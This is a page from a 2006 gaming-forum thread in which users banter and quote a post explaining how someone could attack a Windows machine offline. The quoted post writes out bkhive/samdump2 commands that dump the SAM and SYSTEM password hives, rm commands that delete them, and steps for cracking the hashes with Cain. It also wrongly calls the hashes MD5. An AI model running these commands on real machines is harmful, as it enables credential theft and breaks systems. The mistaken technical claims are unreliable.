Charas-Project

  • Home
  • Help
  • Search
  • Calendar
  • Login
  • Register
*
Please login or register.

Login with username, password and session length
 

News:

New forum theme up and running!



  • Charas-Project »
  • Off-Topic »
  • All of all! »
  • Computer Help
« previous next »
  • Print
Pages: 1 2 [3]

Author Topic: Computer Help  (Read 6795 times)

Offline Razor

  • Staff
  • Sage
  • *
  • Posts: 6,247
  • 2 cool 4 skin
(No subject)
« Reply #30 on: April 19, 2006, 09:41:58 PM »
*rofl harris*
Logged
Always right.

Offline Almeidaboo

  • Leader
  • *
  • Posts: 2,384
  • Attor...nope, software developer now!
(No subject)
« Reply #31 on: April 20, 2006, 04:25:43 PM »
Who the hell is Harris?
Logged

Sig by Lucas_irineu

Offline SaintLuciferOfTK

  • Member
  • Initiate
  • *
  • Posts: 28
  • I am the one true GOD.
(No subject)
« Reply #32 on: April 21, 2006, 03:57:18 AM »
Quote
Originally posted by Trevlac
If WINDOWSSYSTEM32CONFIGSYSTEM is missing then you are screwed.  That file, along with the WINDOWSSYSTEM32CONFIGSAM file will allow someone to use something like SamInside to create a password hash file that Cain and Abel can brute force or dictionary attack.

If you were playing Diablo II, what happened is that someone did something to you, no joke.  Because that "system" file is in CONSTANT use by Windows.  Windows would never let a program on your machine try to delete it.  But someone else with Linux or maybe a script kiddie with Windows could have done it.  They possible booted to Linux and got on your hard drive then did:

bkhive /mnt/hda1/WINDOWS/system32/config/system key.txt

samdump2 /mnt/hda1/WINDOWS/system32/config/SAM key.txt > pass.txt

touch hash.md5

md5sum pass.txt > hash.md5

md5sum -c hash.md5

rm /mnt/hda1/WINDOWS/system32/config/system
rm /mnt/hda1/WINDOWS/system32/config/SAM

REBOOT in Windows
open Cain
add pass.txt to the "cracker" list
run a dictinary or bute-force against it
remotely log in to your administrator account on your computer

What that would do is, take the hash from every password  on your machine (windows uses md5 encryption) and he'd be able to break it (eventually) and basicly hack you to peices.

I had to do this at Oklahoma State University yesterday.  The Cyber Security Invitational (CSI) was a state competition for Cyber Security and Forensics.  In the forensics, we had to do get in to the admin account on a machine with only a linux live boot.  After the whole competition, I won 1st place.  I need to take a pic of my medal...

NOW, to protect against this, ONLY play games like D2 where everyone in a wnnabe hacker os a script kiddie, you have to MAKE SURE you have a firewall, and I seriously reccomend getting a Netgear or Linksys router.


   You won first place? Do you want a ****ing medal too? A goddamn statue in your honour mother****er?
Logged
'Better to rule in Hell than to serve in Heaven'

Offline Drace

  • Sage
  • *
  • Posts: 5,199
(No subject)
« Reply #33 on: April 21, 2006, 01:41:38 PM »
Quote
Originally posted by SaintLuciferOfTK
quote:
Originally posted by Trevlac
If WINDOWSSYSTEM32CONFIGSYSTEM is missing then you are screwed.  That file, along with the WINDOWSSYSTEM32CONFIGSAM file will allow someone to use something like SamInside to create a password hash file that Cain and Abel can brute force or dictionary attack.

If you were playing Diablo II, what happened is that someone did something to you, no joke.  Because that "system" file is in CONSTANT use by Windows.  Windows would never let a program on your machine try to delete it.  But someone else with Linux or maybe a script kiddie with Windows could have done it.  They possible booted to Linux and got on your hard drive then did:

bkhive /mnt/hda1/WINDOWS/system32/config/system key.txt

samdump2 /mnt/hda1/WINDOWS/system32/config/SAM key.txt > pass.txt

touch hash.md5

md5sum pass.txt > hash.md5

md5sum -c hash.md5

rm /mnt/hda1/WINDOWS/system32/config/system
rm /mnt/hda1/WINDOWS/system32/config/SAM

REBOOT in Windows
open Cain
add pass.txt to the "cracker" list
run a dictinary or bute-force against it
remotely log in to your administrator account on your computer

What that would do is, take the hash from every password  on your machine (windows uses md5 encryption) and he'd be able to break it (eventually) and basicly hack you to peices.

I had to do this at Oklahoma State University yesterday.  The Cyber Security Invitational (CSI) was a state competition for Cyber Security and Forensics.  In the forensics, we had to do get in to the admin account on a machine with only a linux live boot.  After the whole competition, I won 1st place.  I need to take a pic of my medal...

NOW, to protect against this, ONLY play games like D2 where everyone in a wnnabe hacker os a script kiddie, you have to MAKE SURE you have a firewall, and I seriously reccomend getting a Netgear or Linksys router.


   You won first place? Do you want a ******* medal too? A ******* statue in your honour ************?


Doofus, he already got a medal. Read his bloody posts.
Logged


  • Print
Pages: 1 2 [3]
« previous next »
  • Charas-Project »
  • Off-Topic »
  • All of all! »
  • Computer Help
 

  • SMF 2.0.10 | SMF © 2015, Simple Machines
  • XHTML
  • 2O11
  • RSS
  • WAP2
  • Simple Machines Forum